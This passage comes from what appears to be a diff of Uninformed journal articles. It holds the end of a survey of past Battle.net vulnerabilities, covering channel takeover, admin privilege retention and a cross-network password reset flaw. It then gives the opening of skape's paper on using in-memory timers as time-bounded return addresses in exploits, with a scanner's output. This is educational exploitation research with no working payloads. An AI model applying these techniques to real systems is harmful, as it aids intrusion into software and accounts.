permissions). So, one could ``take over'' a channel by systematically
|
||||
disconnecting those ``ahead of'' one's client in a channel. A channel is
|
||||
ordered by a user's age in the channel.
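
The succession rule described above can be modelled in a few lines. This is a sketch with hypothetical names, not the server's logic: members are kept oldest first, and when the operator leaves, the designated heir (if present) or otherwise the oldest remaining member becomes operator.

```python
class OperatorChannel:
    def __init__(self):
        self.members = []            # ordered by age in the channel, oldest first
        self.operator = None
        self.designated_heir = None  # optionally set by the current operator

    def join(self, user):
        self.members.append(user)
        if self.operator is None:
            self.operator = user

    def leave(self, user):
        self.members.remove(user)
        if self.designated_heir == user:
            self.designated_heir = None
        if user != self.operator:
            return
        if self.designated_heir in self.members:
            self.operator = self.designated_heir
        else:
            self.operator = self.members[0] if self.members else None
        self.designated_heir = None
```

Forcing everyone ahead of a given client to disconnect therefore moves that client to the front of the list, which is why the collision trick was useful for taking over a channel.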
|
||||
|
||||
|
||||
3.2.6) Server de-synchronization
|
||||
|
||||
At one time, a race condition existed such that if a malicious user were to log on to
|
||||
two connected (i.e. not-split) servers at the same time, the two servers would
|
||||
cease to communicate with one another, causing a server split to occur. It is
|
||||
difficult to provide an exact explanation for why this would occur given the
|
||||
collision elimination mechanism described above for users that are logged on
|
||||
with the same unique name, but it is assumed that in the process of
|
||||
synchronizing a new user between servers, there is a period of time where
|
||||
a second server can also attempt to synchronize the same user and cause one of
|
||||
the servers to get into an invalid state. According to observations, this
|
||||
invalid state would eventually be resolved automatically, usually after 10-15
|
||||
minutes.
|
||||
|
||||
|
||||
3.2.7) Seeing invisible users
|
||||
|
||||
Battle.net administrators have the ability to become invisible to normal
|
||||
users. However, until recently, this was flawed in that the server would
|
||||
expose the existence of an invisible user to regular users during certain
|
||||
operations. In particular, if one ignores or unignores a user, the server
|
||||
will re-send the state of all users that are ignored or unignored in the
|
||||
current channel. Before this bug was fixed, this list included any invisible
|
||||
users. It is worth noting that the official game clients will ignore any
|
||||
unknown users returned in the state update message, so this vulnerability
|
||||
could only be utilized by a third party client.
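
A fix of this kind comes down to applying the visibility filter on the server, in every code path that sends user state, rather than relying on the client to discard unknown users. A minimal sketch with hypothetical names follows; it assumes administrators may see invisible users, which the text does not state.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    invisible: bool = False
    is_admin: bool = False


def users_visible_to(viewer, channel_users):
    """Users whose state may be sent to viewer; invisible users go only to administrators."""
    return [u for u in channel_users if not u.invisible or viewer.is_admin]
```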
|
||||
|
||||
|
||||
3.2.8) Administrative command discovery
|
||||
|
||||
Originally, Battle.net would provide no acknowledgement if one issued an
|
||||
unrecognized chat command ("slash-command"). Blizzard later changed the
|
||||
server software to respond with an error message if a user sent an unknown
|
||||
command, but the server originally silently ignored the command if the user
|
||||
issued a privileged (administrator-only) command. This allowed end users to
|
||||
discover the names of various commands accessible to system administrators.
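
The leak disappears if an unprivileged user receives the same reply for a privileged command as for a command that does not exist. The following sketch uses a hypothetical command table and error string to show the idea.

```python
# Hypothetical command table: command name -> whether it is administrator-only.
KNOWN_COMMANDS = {"whisper": False, "kick": False, "shutdown": True}
UNKNOWN_REPLY = "That is not a valid command."  # illustrative wording


def handle_command(name, is_admin):
    admin_only = KNOWN_COMMANDS.get(name)
    if admin_only is None or (admin_only and not is_admin):
        # Identical reply in both cases, so the command's existence is not revealed.
        return UNKNOWN_REPLY
    return f"ok: {name}"
```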
|
||||
|
||||
|
||||
3.2.9) Gaining administrative privileges
|
||||
|
||||
Due to an oversight in the way administrator permissions are assigned to
|
||||
Battle.net accounts, it was at one time possible to overwrite the account of
|
||||
an administrator with a new account and keep the special permissions otherwise
|
||||
associated with the account. (An account can be overwritten like so if it has
|
||||
not been accessed in 90 days). This could have very nearly resulted in a
|
||||
disaster for Blizzard, had a more malicious user discovered this vulnerability
|
||||
and abused such privileges.
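
One way to avoid this class of problem is to build a completely fresh record whenever an expired account name is reused, so that nothing attached to the old record survives. The sketch below assumes a hypothetical in-memory account table; only the 90-day inactivity period comes from the text.

```python
from dataclasses import dataclass, field

EXPIRY_DAYS = 90  # inactivity period given in the text


@dataclass
class Account:
    password_hash: str
    days_since_access: int = 0
    flags: set = field(default_factory=set)  # e.g. {"admin"}


def create_account(accounts, name, password_hash):
    existing = accounts.get(name)
    if existing is not None and existing.days_since_access < EXPIRY_DAYS:
        raise ValueError("account name is in use")
    # Fresh record: no flags carry over from an expired account of the same name.
    accounts[name] = Account(password_hash=password_hash)
    return accounts[name]
```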
|
||||
|
||||
|
||||
3.2.10) Obtaining passwords
|
||||
|
||||
Eventually, Blizzard implemented a password recovery mechanism whereby one
|
||||
could associate an e-mail address with an account, and request a password
|
||||
change through the Battle.net protocol for an account at logon time. This
|
||||
would result in an e-mail being dispatched to the registered address. If the
|
||||
user then replied to the mail as instructed, they would be automatically
|
||||
mailed back with a new account password. Unfortunately, as originally
|
||||
implemented, this system did not properly perform validation on the
|
||||
confirmation mail that the user was required to send. In particular, if a
|
||||
malicious user created an account ``victim'' on one Battle.net network, such
|
||||
as the Asian network, and then requested a password reset for that account,
|
||||
they could alter the return email slightly and actually reset the password for
|
||||
the account ``victim'' on a different Battle.net network, such as the USEast
|
||||
network. This exploit was actually publicly disclosed and saw over a day of
|
||||
heavy abuse before Blizzard managed to patch it.
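
The underlying requirement is that a confirmation be bound to both the network and the account it was issued for. The sketch below is one possible approach using a keyed MAC, with hypothetical function names and a server-side secret. How Blizzard actually repaired the mechanism is not described in the text.

```python
import hashlib
import hmac


def make_reset_token(secret, network, account):
    """Token that is only valid for this exact (network, account) pair."""
    msg = f"{network}\x00{account}".encode("utf-8")
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def confirm_reset(secret, network, account, token):
    expected = make_reset_token(secret, network, account)
    return hmac.compare_digest(expected, token)
```

With such a token, a confirmation issued for ``victim'' on the Asian network fails validation when it is replayed against ``victim'' on USEast.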
|
||||
|
||||
|
||||
4) Battle.net server emulation
|
||||
|
||||
Blizzard 'declared war' on the programmers of servers that implement the
|
||||
Battle.net protocol some time ago when they took the developers of ``bnetd''
|
||||
to court. As of Warcraft III, they have taken active measures to make life
|
||||
difficult for developers programming third party Battle.net-compatible
|
||||
servers. In particular, two actions are of note:
|
||||
|
||||
During the Warcraft III Expansion beta test, Blizzard implemented an
|
||||
encryption scheme for the Battle.net protocol (this was only used during the
|
||||
beta test and not on production Battle.net). This consisted of using the RC4
|
||||
cipher to encrypt messages sent to and received from the server. The tricky part
|
||||
was that Blizzard had hardcoded constants that were encrypted using the cipher
|
||||
state, but never actually sent on the wire (these constants were different for
|
||||
each message). This made implementing a server difficult, as one had to find
|
||||
each magic constant. Unfortunately, Blizzard neglected to consider the possibility
|
||||
of someone releasing a hacked version of the client that zeroed the RC4
|
||||
initialization parameters, such that the entire encrypted stream became
|
||||
plaintext.
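
How zeroed initialization parameters can turn the stream into plaintext is easy to see with a textbook RC4. This is only a sketch under the assumption that the zeroing leaves the cipher's state table filled with zeros; the text does not describe the actual patch, and the function names are illustrative.

```python
def rc4_key_schedule(key):
    """Standard RC4 key scheduling: returns the initial 256-entry state table."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    return state


def rc4_crypt(state, data):
    """XOR data with the RC4 keystream generated from a copy of the given state."""
    s = list(state)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


# With an all-zero state table every keystream byte is zero, so the
# "ciphertext" is identical to the plaintext.
ZEROED_STATE = [0] * 256
```

Calling rc4_crypt(ZEROED_STATE, message) returns the message unchanged, while a state produced by rc4_key_schedule encrypts normally.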
|
||||
|
||||
After several patches, Blizzard implemented a scheme by which a Warcraft III
|
||||
client could verify that it was indeed connecting to a genuine Blizzard
|
||||
Battle.net server. This scheme worked by having the Battle.net server sign
|
||||
its IP address and send the resulting signature to the client, which would
|
||||
refuse to log on if the server's IP address did not match the signature.
|
||||
However, in the original implementation, the game client only checked the
|
||||
first four bytes of the signed data, and did not validate the remaining
|
||||
(normally zero) 124 bytes. This allows one to easily brute-force a signature
|
||||
that has a desired IP address, as one only has to check 32 bits of possible
|
||||
signatures at most to find it.
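
The difference between the flawed and the corrected check can be sketched on the recovered (already decoded) signature block. The layout assumed here, four address bytes followed by 124 zero bytes, follows the description above; the byte order of the address and the function names are assumptions, and the public-key operation itself is left out.

```python
import ipaddress

SIGNED_BLOCK_LEN = 128  # 4 address bytes + 124 (normally zero) bytes, per the text


def expected_block(ip):
    """Block a genuine server is assumed to sign for the given IPv4 address."""
    return ipaddress.IPv4Address(ip).packed + bytes(SIGNED_BLOCK_LEN - 4)


def weak_check(decoded, ip):
    """Flawed check: only the first four bytes are compared."""
    return decoded[:4] == expected_block(ip)[:4]


def strict_check(decoded, ip):
    """Corrected check: all 128 bytes must match."""
    return len(decoded) == SIGNED_BLOCK_LEN and decoded == expected_block(ip)
```

Under the weak check any candidate signature whose decoded block happens to start with the right four bytes is accepted, so on the order of 2**32 random candidates suffice. The strict check would require all 1024 bits to match.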
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
Developing a platform to support a diverse set of requirements such as
|
||||
Battle.net is certainly no easy task. Though the original design could have
|
||||
perhaps been improved upon, it is the author's opinion that given what they
|
||||
had to work with, Blizzard did a reasonable job of ensuring that the service
|
||||
they set out to create stood the test of time, especially considering that
|
||||
support for all the future features of their later game clients could not have
|
||||
been predicted at the time the system was originally created. Nevertheless, it
|
||||
is the author's opinion that a system designed where clients are untrusted and
|
||||
all actions performed by them are subject to full validation would have been
|
||||
far more secure from the start, without any of the various problems Blizzard
|
||||
has encountered over the years.
|
971
uninformed/2.2.txt
Normal file
|
@ -0,0 +1,971 @@
|
|||
Temporal Return Addresses: Exploitation Chronomancy
|
||||
skape
|
||||
mmiller@hick.org
|
||||
Last modified: 8/6/2005
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: Nearly all existing exploitation vectors depend on some knowledge of
|
||||
a process' address space prior to an attack in order to gain meaningful
|
||||
control of execution flow. In cases where this is necessary, exploit authors
|
||||
generally make use of static addresses that may or may not be portable between
|
||||
various operating system and application revisions. This fact can make
|
||||
exploits unreliable depending on how well researched the static addresses were
|
||||
at the time that the exploit was implemented. In some cases, though, it may
|
||||
be possible to predict and make use of certain addresses in memory that do not
|
||||
have static contents. This document introduces the concept of temporal
|
||||
addresses and describes how they can be used, under certain circumstances, to
|
||||
make exploitation more reliable.
|
||||
|
||||
Disclaimer: This document was written in the interest of education. The
|
||||
author cannot be held responsible for how the topics discussed in this
|
||||
document are applied.
|
||||
|
||||
Thanks: The author would like to thank H D Moore, spoonm, thief, jhind,
|
||||
johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of
|
||||
nologin!
|
||||
|
||||
With that, on with the show...
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
A common impediment to the implementation of portable and reliable exploits is
|
||||
the location of a return address. It is often required that a specific
|
||||
instruction, such as a jmp esp, be located at a predictable location in memory
|
||||
so that control flow can be redirected into an attacker controlled buffer.
|
||||
This scenario is more common on Windows, but applicable scenarios exist on
|
||||
UNIX derivatives as well. Many times, though, the locations of the
|
||||
instructions will vary between individual versions of an operating system,
|
||||
thus limiting an exploit to a set of version-specific targets that may or may
|
||||
not be directly determinable at attack time. In order to make an exploit
|
||||
independent of, or at least less dependent on, a target's operating system
|
||||
version, a shift in focus becomes necessary.
|
||||
|
||||
Through the blur of rhyme and reason an attacker might focus and realize that
|
||||
not all viable return addresses will exist indefinitely in a target process'
|
||||
address space. In fact, viable return addresses can be found in a transient
|
||||
state throughout the course of a program's execution. For instance, a pointer
|
||||
might be stored at a location in memory that happens to contain a viable two
|
||||
byte instruction somewhere within the bytes that compose the pointer's
|
||||
address. Alternatively, an integer value somewhere in memory could be
|
||||
initialized to a value that is equivalent to a viable instruction. In both
|
||||
cases, though, the contents and locations of the values will almost certainly
|
||||
be volatile and unpredictable, thus making them unsuitable for use as return
|
||||
addresses.
|
||||
|
||||
Fortunately, however, there does exist at least one condition that can lend
|
||||
itself well to portable exploitation that is bounded not by the operating
|
||||
system version the target is running on, but instead by a defined window of
|
||||
time. In a condition such as this, a timer of some sort must exist at a
|
||||
predictable location in memory that is known to be updated at a constant time
|
||||
interval, such as every second. The location in memory that the timer resides
|
||||
at is known as a temporal address. On top of this, it is also important for
|
||||
the attacker to determine the scale of measurement the timer is operating on,
|
||||
such as whether or not it's measured in epoch time (from 1970 or 1601) or if
|
||||
it's simply acting as a counter. With these three elements identified, an
|
||||
attacker can attempt to predict the periods of time where a useful instruction
|
||||
can be found in the bytes that compose the future state of any timer in
|
||||
memory.
|
||||
|
||||
To help illustrate this, suppose an attacker is attempting to find a reliable
|
||||
location of a jmp edi instruction. The attacker knows that the program being
|
||||
exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a
|
||||
predictable location in memory. By doing some analysis, the attacker could
|
||||
determine that on Wednesday July 27th, 2005 at 4:39:12PM CDT, a jmp edi could
|
||||
be found within any four byte timer that stores the number of seconds since
|
||||
1970. The window of opportunity, however, would only last for 4 minutes and 16
|
||||
seconds assuming the timer is updated every second.
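
As a rough sketch of the analysis described above, the following Python
computes the timer value at which a jmp edi (0xff 0xe7) begins at byte index 1
of a little-endian four byte counter of seconds since 1970. The helper name
window_start and the choice of 0x42 for the high byte are assumptions made for
illustration. The date is printed in UTC so that no timezone is assumed.

```python
from datetime import datetime, timezone

JMP_EDI = bytes([0xFF, 0xE7])  # raw opcode bytes for jmp edi

def window_start(opcode, index, high_bytes, size=4):
    """Timer value at which `opcode` first appears at byte `index`.

    Bytes below `index` are zero (the moment the window opens) and
    `high_bytes` fills the positions above the opcode.
    """
    raw = bytes(index) + opcode + high_bytes
    assert len(raw) == size
    return int.from_bytes(raw, "little")

start = window_start(JMP_EDI, 1, bytes([0x42]))  # 0x42 is an assumed high byte
length = 256 ** 1  # seconds before byte index 1 changes

print(hex(start), datetime.fromtimestamp(start, tz=timezone.utc))
print("window lasts", length // 60, "minutes", length % 60, "seconds")
```

The window length follows from the opcode byte closest to the LSB: byte index
1 of a timer that ticks once per second changes every 256 seconds.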
|
||||
|
||||
By accounting for timing as a factor in the selection of return addresses, an
|
||||
attacker can be afforded options beyond those normally seen when the address
|
||||
space of a process is viewed as unchanging over time. In that light, this
|
||||
document is broken into three portions. First, the steps needed to find,
|
||||
analyze, and make use of temporal addresses will be explained. Second,
|
||||
upcoming viable opcode windows will be shown and explained along with methods
|
||||
that can be used to determine target time information prior to exploitation.
|
||||
Finally, examples of commonly occurring temporal addresses on Windows NT+ will
|
||||
be described and analyzed to provide real world examples of the subject of
|
||||
this document.
|
||||
|
||||
Before starting, though, it is important to understand some of the terminology
|
||||
that will be used, or perhaps abused, in the interest of conveying the
|
||||
concepts. The term temporal address is used to describe a location in memory
|
||||
that contains a timer of some sort. The term opcode is used interchangeably
|
||||
with the term instruction to convey the set of viable bytes that could
|
||||
partially compose a given temporal state. The term update period is used to
|
||||
describe the amount of time that it takes for the contents of a temporal
|
||||
address to change. Finally, the term scale is used to describe the unit of
|
||||
measure for a given temporal address.
|
||||
|
||||
|
||||
3) Locating Temporal Addresses
|
||||
|
||||
In order to make use of temporal addresses it is first necessary to devise a
|
||||
method of locating them. To begin this search it is necessary that one
|
||||
understand the attributes of a temporal address. All temporal addresses are
|
||||
defined as storing a time-associated counter that increments at a constant
|
||||
interval. For instance, an example would be a location in memory that stores
|
||||
the number of seconds since Jan. 1, 1970 that is incremented every second. As
|
||||
a more concrete definition, all time-associated counters found in memory are
|
||||
represented in terms of a scale (the unit of measure), an interval or period
|
||||
(how often they are updated), and have a maximum storage capacity (variable
|
||||
size). If any of these parts are unknown or variant for a given memory location,
|
||||
it is impossible for an attacker to consistently leverage it for use as a
|
||||
time-bounded return address because of the inability to predict the byte
|
||||
values at the location for a given period of time.
|
||||
|
||||
With the three major components of a temporal address identified (scale,
|
||||
period, and capacity), a program can be written to search through a process'
|
||||
address space with the goal of identifying regions of memory that are updated
|
||||
at a constant period. From there, a scale and capacity can be inferred based
|
||||
on an arbitrarily complex set of heuristics, the simplest of which can
|
||||
identify regions that are storing epoch time. It's important to note, though,
|
||||
that not all temporal addresses will have a scale that is measured as an
|
||||
absolute time period. Instead, a temporal address may simply store the number
|
||||
of seconds that have passed since the start of execution, among other
|
||||
scenarios. These temporal addresses are described as having a scale that is
|
||||
simply equivalent to their period and are for that reason referred to as
|
||||
counters.
|
||||
|
||||
To illustrate the feasibility of such a program, the author has implemented an
|
||||
algorithm that should be conceptually portable to all platforms, though the
|
||||
implementation itself is limited to Windows NT+. The approach taken by the
|
||||
author, at a high level, is to poll a process' address space multiple times
|
||||
with the intention of analyzing changes to the address space over time. In
|
||||
order to reduce the amount of memory that must be polled, the program is also
|
||||
designed to skip over regions that are backed by an image file or are
|
||||
otherwise inaccessible.
|
||||
|
||||
To accomplish this task, each polling cycle is designed to be separated by a
|
||||
constant (or nearly constant) time interval, such as 5 seconds. By increasing
|
||||
the interval between polling cycles the program can detect temporal addresses
|
||||
that have a larger update period. The granularity of this period of time is
|
||||
measured in nanoseconds in order to support high resolution timers that may
|
||||
exist within the target process' address space. This allows the program to
|
||||
detect timers measured in nanoseconds, microseconds, milliseconds, and
|
||||
seconds. The purpose of the delay between polling cycles is to give temporal
|
||||
address candidates the ability to complete one or more update periods. As
|
||||
each polling cycle occurs, the program reads the contents of the target
|
||||
process' address space for a given region and caches it locally within the
|
||||
scanning process. This is necessary for the next phase.
|
||||
|
||||
After at least two polling cycles have completed, the program can compare the
|
||||
cached memory regions from the most recent view of the target
|
||||
process' address space and the previous view. This is accomplished by walking
|
||||
through the contents of each cached memory region in four byte increments to
|
||||
see if there is any difference between the two views. If a temporal address
|
||||
exists, the contents of the two views should have a difference that is no
|
||||
larger than the maximum period of time that occurred between the two polling
|
||||
cycles. It's important to remember that the maximum period can be conveyed
|
||||
down to nanosecond granularity. For instance, if the polling cycle period was
|
||||
5 seconds, any portion of memory that changed by more than 5 seconds, 5000
|
||||
milliseconds, or 5000000 microseconds is obviously not a temporal address
|
||||
candidate. To that point, any region of memory that didn't change at all is
|
||||
also most likely not a temporal address candidate, though it is possible that
|
||||
the region of memory simply has an update period that is longer than the
|
||||
polling cycle.
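
The comparison step can be sketched in Python as follows. This is not the
author's telescope implementation: the function name find_candidates, the use
of in-memory byte strings in place of a real process read, and the sample
values are all assumptions. The bound is the elapsed time in nanoseconds, the
finest granularity considered above.

```python
import struct

def find_candidates(prev, curr, base, elapsed_ns):
    """Compare two snapshots of one region in four byte increments.

    Returns (address, difference) pairs whose 32-bit little-endian value
    changed, but by no more than the elapsed time in nanoseconds.
    """
    hits = []
    for off in range(0, min(len(prev), len(curr)) - 3, 4):
        old, = struct.unpack_from("<I", prev, off)
        new, = struct.unpack_from("<I", curr, off)
        diff = (new - old) & 0xFFFFFFFF  # tolerate 32-bit wraparound
        if 0 < diff <= elapsed_ns:
            hits.append((base + off, diff))
    return hits

# Hypothetical snapshots taken one second apart: a constant, a seconds
# counter, and a value that changes far too much to be a timer.
prev = struct.pack("<3I", 0xDEADBEEF, 1122500352, 0x10000000)
curr = struct.pack("<3I", 0xDEADBEEF, 1122500353, 0xF0000000)
hits = find_candidates(prev, curr, 0x0012FF78, 1_000_000_000)
print([(hex(addr), diff) for addr, diff in hits])
```

Only the middle value survives: the first did not change at all and the third
changed by more than any timer could have in the elapsed time.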
|
||||
|
||||
Once a memory location is identified that has a difference between the two
|
||||
views that is within or equal to the polling cycle period, the next step of
|
||||
analysis can begin. It's perfectly possible for memory locations that meet
|
||||
this requirement to not actually be timers, so further analysis is necessary
|
||||
to weed them out. At this point, though, memory locations such as these can
|
||||
be referred to as temporal address candidates. The next step is to attempt to
|
||||
determine the period of the temporal address candidate. This is accomplished
|
||||
by some rather silly, but functional, logic.
|
||||
|
||||
First, the delta between the polling cycles is calculated down to nanosecond
|
||||
granularity. In a best case scenario, the delta of a polling cycle that
|
||||
is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to
|
||||
assume this constant though, as thread scheduling and other non-constant
|
||||
parameters can affect the delta between polling cycles for a given memory
|
||||
region. The next step is to iteratively compare the difference between the
|
||||
two views to the current delta to see if the difference is greater than or
|
||||
equal to the current delta. If it is, it can be assumed that the difference
|
||||
is within the current unit of measure. If it's not, the current delta should
|
||||
be divided by 10 to progress to the next unit of measure. When broken down,
|
||||
the progressive transition in units of measurement is described in figure 3.1.
|
||||
|
||||
|
||||
Delta          Measurement
------------------------------
1000000000     Nanoseconds
100000000      10 Nanoseconds
10000000       100 Nanoseconds
1000000        Microseconds
100000         10 Microseconds
10000          100 Microseconds
1000           Milliseconds
100            10 Milliseconds
10             100 Milliseconds
1              Seconds
|
||||
|
||||
Figure 3.1: Delta measurement reductions
|
||||
|
||||
|
||||
Once a unit of measure for the update period is identified, the difference is
|
||||
divided by the current delta to produce the update period for a given temporal
|
||||
address candidate. For example, if the difference was 5 and the current delta
|
||||
was 5, the update period for the temporal address candidate would be 1 second
|
||||
(5 updates over the course of 5 seconds). With the update period identified,
|
||||
the next step is to attempt to determine the storage capacity of the temporal
|
||||
address candidate.
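
A minimal sketch of this reduction in Python is shown below. The function
name update_period is hypothetical, and reading the final quotient as the
number of updates per unit of measure is an assumption about the logic
described above rather than a copy of the author's code.

```python
def update_period(diff, elapsed_ns):
    """Return (unit_ns, updates_per_unit) for a value that grew by `diff`.

    `unit_ns` is the unit of measure in nanoseconds, found by dividing
    the delta by 10 until the difference is at least as large as it.
    Returns None when no unit down to one second fits.
    """
    delta, unit_ns = elapsed_ns, 1
    while delta >= 1:
        if diff >= delta:
            return unit_ns, diff // delta
        delta //= 10   # progress to the next unit of measure
        unit_ns *= 10
    return None

print(update_period(5, 5_000_000_000))           # seconds counter
print(update_period(50_000_000, 5_000_000_000))  # 100 nanosecond timer
```

With a 5 second polling cycle, a difference of 5 is only matched once the
delta has been reduced nine times, which places the unit at 10^9 nanoseconds
(one second) with one update per unit.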
|
||||
|
||||
In this case, the author chose to take a shortcut, though there are most
|
||||
certainly better approaches that could be taken given sufficient interest.
|
||||
The author chose to assume that if the update period for a temporal address
|
||||
candidate was measured in nanoseconds, then it was almost certainly at least
|
||||
the size of a 64-bit integer (8 bytes on x86). On the other hand, all other
|
||||
update periods were assumed to imply a 32-bit integer (4 bytes on x86).
|
||||
|
||||
With the temporal address candidate's storage capacity identified in terms of
|
||||
bytes, the next step is to identify the scale that the temporal address may be
|
||||
conveying (the timer's unit of measure). To accomplish this, the program
|
||||
calculates, for both 1970 and 1601, the range of seconds since that epoch that
spans from the current time minus at least the polling cycle period to the current time itself.
|
||||
The temporal address candidate's current value (as stored in memory) is then
|
||||
converted to seconds using the determined update period and then compared
|
||||
against the two epoch time ranges. If the candidate's converted current value
|
||||
is within either epoch time range then it can most likely be assumed that the
|
||||
temporal address candidate's scale is measured from epoch time, either from
|
||||
1970 or 1601 depending on the range it was within. While this sort of
|
||||
comparison is rather simple, any other arbitrarily complex set of logic could
|
||||
be put into place to detect other types of time scales. In the event that
|
||||
none of the logic matches, the temporal address candidate is deemed to simply
|
||||
have a scale of a counter (as defined previously in this chapter).
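
The epoch comparison might look like the following in Python. The function
name guess_scale and its parameters are hypothetical. The labels mirror the
ones printed by the tool output shown in this chapter, and the offset of
11644473600 seconds between 1601 and 1970 is the constant used later in this
document.

```python
import time

EPOCH_1601_OFFSET = 11644473600  # seconds between 1601 and 1970

def guess_scale(value, unit_ns, poll_s, now=None):
    """Classify a candidate as Epoch (1970), Epoch (1601) or Counter.

    `value` is the candidate's current contents, `unit_ns` its unit of
    measure in nanoseconds and `poll_s` the polling cycle period.
    """
    now = time.time() if now is None else now
    secs = value * unit_ns / 1_000_000_000  # timer value in seconds
    for label, offset in (("Epoch (1970)", 0),
                          ("Epoch (1601)", EPOCH_1601_OFFSET)):
        if now + offset - poll_s <= secs <= now + offset:
            return label
    return "Counter"

now = 1123305669.0  # assumed current time, in seconds since 1970
print(guess_scale(1123305667, 1_000_000_000, 5, now))
print(guess_scale((1123305667 + EPOCH_1601_OFFSET) * 10**7, 100, 5, now))
print(guess_scale(89998629, 1_000_000, 5, now))
```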
|
||||
|
||||
Finally, with the period, scale, and capacity for the temporal address
|
||||
candidate identified, the only thing left is to check to see if the three
|
||||
components are equivalent to previously collected components for the given
|
||||
temporal address candidate. If they differ in orders of magnitude then it is
|
||||
probably safe to assume that the candidate is not actually a temporal address.
|
||||
On the other hand, consistent components between polling cycles for a temporal
|
||||
address candidate are almost a sure sign that it is indeed a temporal address.
|
||||
|
||||
When everything is said and done, the program should collect every temporal
|
||||
address in the target process that has an update period less than or equal to
|
||||
the polling cycle period. It should also have determined the scale and size
|
||||
of the temporal address. When run on Windows against a program that is
|
||||
storing the current epoch time since 1970 in seconds in a variable every
|
||||
second, the following output is displayed:
|
||||
|
||||
|
||||
C:\>telescope 2620
|
||||
[*] Attaching to process 2620 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
|
||||
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
This output tells us that the address of the variable that is storing the
|
||||
epoch time since 1970 can be found at 0x0012FF7C and has an update period of
|
||||
one second. The other things that were found will be discussed later in this
|
||||
document.
|
||||
|
||||
|
||||
3.1) Determining Per-byte Durations
|
||||
|
||||
Once the update period and size of a temporal address have been determined, it
|
||||
is possible to calculate the amount of time it takes to change each byte
|
||||
position in the temporal address. For instance, if a four byte temporal
|
||||
address with an update period of 1 second were found in memory, the first byte
|
||||
(or LSB) would change once every second, the second byte would change once
|
||||
every 256 seconds, the third byte would change once every 65536 seconds, and
|
||||
the fourth byte would change once every 16777216 seconds. The reason these
|
||||
properties are exhibited is because each byte position has 256 possibilities
|
||||
(0x00 to 0xff inclusive). This means that each byte position increases in
|
||||
duration by 256 to a given power. This can be described as shown in figure
|
||||
3.2. Let x equal the byte index starting at zero for the LSB.
|
||||
|
||||
|
||||
duration(x) = 256 ^ x
|
||||
|
||||
Figure 3.2: Period independent byte durations
|
||||
|
||||
The next step to take after determining period-independent byte durations is
to convert the durations to a more convenient unit when the period is more
granular than a second. For instance, figure 3.3 shows that if each byte
duration is measured in 100 nanosecond intervals for an 8 byte temporal
address, dividing by 10^7 converts a byte duration from 100 nanosecond
intervals to seconds.
|
||||
|
||||
|
||||
tosec(x) = duration(x) / 10^7
|
||||
|
||||
Figure 3.3: 100 nanosecond byte durations to seconds
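
The two functions translate directly into Python. The ticks_per_second
parameter is an addition for illustration so that the same helper covers both
the one second timer and the 100 nanosecond timer. Integer division is used,
so partial seconds are truncated.

```python
def duration(x):
    """Updates needed before byte index x (0 = LSB) changes."""
    return 256 ** x

def tosec(x, ticks_per_second=10**7):
    """Whole seconds before byte index x changes."""
    return duration(x) // ticks_per_second

print([tosec(x, 1) for x in range(4)])  # 4 byte timer, 1 second period
print([tosec(x) for x in range(8)])     # 8 byte timer, 100 ns period
```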
|
||||
|
||||
|
||||
This phase is especially important when it comes to calculating viable opcode
|
||||
windows because it is necessary to know for how long a viable opcode will
|
||||
exist which is directly dependent on the duration of the opcode byte closest
|
||||
to the LSB. This will be discussed in more detail in chapter 4.
|
||||
|
||||
|
||||
4) Calculating Viable Opcode Windows
|
||||
|
||||
Once a set of temporal addresses has been located, the next logical step is to
|
||||
attempt to calculate the windows of time that one or more viable opcodes can
|
||||
be found within the bytes of the temporal address. It is also just as
|
||||
important to calculate the duration of each byte within the temporal address.
|
||||
This is the type of information that is required in order to determine when a
|
||||
portion of a temporal address can be used as a return address for an exploit.
|
||||
The approach taken to accomplish this is to make use of the equations provided
|
||||
in the previous chapter for calculating the number of seconds it takes for
|
||||
each byte to change based on the update period for a given temporal address.
|
||||
By using the tosec function for each byte index, a table can be created as
|
||||
illustrated in figure 4.1 for a 100 nanosecond 8 byte timer.
|
||||
|
||||
|
||||
Byte Index   Seconds      (ext)
----------------------------------------------------------------------
0            0            (zero)
1            0            (zero)
2            0            (zero)
3            1            (1 sec)
4            429          (7 mins 9 secs)
5            109951       (1 day 6 hours 32 mins 31 secs)
6            28147497     (325 days 18 hours 44 mins 57 secs)
7            7205759403   (228 years 179 days 23 hours 50 mins 3 secs)
|
||||
|
||||
Figure 4.1: 8 byte 100ns per-byte durations in seconds
|
||||
|
||||
|
||||
This shows that any opcodes starting at byte index 4 will have a 7 minute and
|
||||
9 second window of time. The only thing left to do is figure out when to
|
||||
strike.
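
For readers who want to regenerate the table for a different period, a small
Python sketch follows. The describe helper is hypothetical and assumes 365 day
years, which is what the extended column of figure 4.1 appears to use.

```python
def describe(seconds):
    """Format a duration as years, days, hours, mins and secs."""
    parts = []
    for name, size in (("year", 31536000), ("day", 86400),
                       ("hour", 3600), ("min", 60), ("sec", 1)):
        count, seconds = divmod(seconds, size)
        if count:
            parts.append(f"{count} {name}{'' if count == 1 else 's'}")
    return " ".join(parts) or "zero"

TICKS_PER_SECOND = 10**7  # 100 nanosecond update period

for index in range(8):
    secs = 256 ** index // TICKS_PER_SECOND
    print(index, secs, describe(secs))
```

Changing TICKS_PER_SECOND to 1 gives the durations for a timer that is
updated once per second.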
|
||||
|
||||
|
||||
5) Picking the Time to Strike
|
||||
|
||||
The time to attack is entirely dependent on both the update period of the
|
||||
temporal address and its scale. In most cases, temporal addresses that have a
|
||||
